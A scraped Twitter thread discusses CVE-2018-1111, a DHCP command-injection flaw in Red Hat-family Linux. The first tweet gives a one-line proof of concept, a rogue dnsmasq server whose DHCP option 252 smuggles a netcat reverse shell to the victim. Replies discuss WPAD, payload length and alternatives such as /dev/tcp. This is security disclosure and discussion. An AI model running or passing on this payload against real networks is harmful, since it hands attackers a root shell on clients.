Twitter | Search | |
Barkın Kılıç
-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc:
Reply Retweet Like More
0day.marketing May 15
Replying to @Barknkilic @cnbrkbolat
YOU WIN 1 MILLION ODAYs. SEND US YOUR WALLET AND WE'LL SEND YOU ONE MILLION ODAYs,
Reply Retweet Like
Canberk Bolat May 15
i have 0day to publish soon, would you gelp me to get my 0day brand?
Reply Retweet Like
0day.marketing May 15
Replying to @cnbrkbolat @Barknkilic
Sure! DM for inquiries 😎
Reply Retweet Like
Rich Felker May 15
Wait, option 252 is WPAD right? Does this mean RH is letting DHCP servers inject MITM?
Reply Retweet Like
Barkın Kılıç May 15
uhuh, but since if i could spoof dhcp server, i wouldn’t be going after wdap option for mitm :)
Reply Retweet Like
Rich Felker May 15
IIRC Windows browsers let you MITM TLS connections with WPAD. You can't do that with a rogue router/dhcp server without client honoring WPAD.
Reply Retweet Like
Adam Barnes May 15
Is... Is this a parody?
Reply Retweet Like
Barkın Kılıç May 15
i would enjoy it better if this was a windows bug but since it is a linux vulnerability, still it doesn’t have any value in that area :) this is the reason i said i wouldn’t go after wpad option.
Reply Retweet Like
Rich Felker May 15
Well if RH has this bug, I suspect they've implemented Windows-equivalent misfeatures...
Reply Retweet Like
0day.marketing May 15
It's a public service~ >100 people can't be wrong!
Reply Retweet Like
Barkın Kılıç May 15
Yea that’s a good point but you are missing the real point, which is this vuln. coming from NetworkManager dispatcher script, the reason why i used wpad options is that, it is the only place i have successful placed my RCE payload there.
Reply Retweet Like
₳ᴆᴀᴍ May 15
Replying to @Barknkilic @cnbrkbolat
Looks like the "gaping security hole" version of netcat needs to be installed, am I reading this correctly? Is there any way to punch that reverse shell out without that version of nc installed?
Reply Retweet Like
Barkın Kılıç May 15
Replying to @nixhaxor @cnbrkbolat
Actually nc is the easiest way to create tweetable PoC for this bug, in Centos there is no nc in default install and i can still exploit with other reverse shell techniques. Only limitation is that your payload should be 255 byte long.
Reply Retweet Like
₳ᴆᴀᴍ May 15
Replying to @Barknkilic @cnbrkbolat
Oh! I was wondering about /dev/tcp. Gotcha :)
Reply Retweet Like
➖Nɘt➖ May 15
Replying to @Barknkilic @cnbrkbolat
This is just overkill !! Imagine this shipped into a pi zero for physical attacks on locked computers! 🤩
Reply Retweet Like
➖Nɘt➖ May 15
It would be a nice update to poisontap ;)
Reply Retweet Like
Alain O'Dea May 15
Friends don’t let friends `while read` without `-r`.
Reply Retweet Like
Uncommon Criteria May 16
Replying to @Barknkilic @cnbrkbolat
This would be a good week to troll any visiting pen-testers who might happen to have RedHat-based VMs :)
Reply Retweet Like
Jan Wiescher May 16
Replying to @Barknkilic @cnbrkbolat
I have trouble finding an info if this exploit requires NetworkManager running on the victim host, since the Bug is in the NetworkManager Script of dhclient. Do you know if it is?
Reply Retweet Like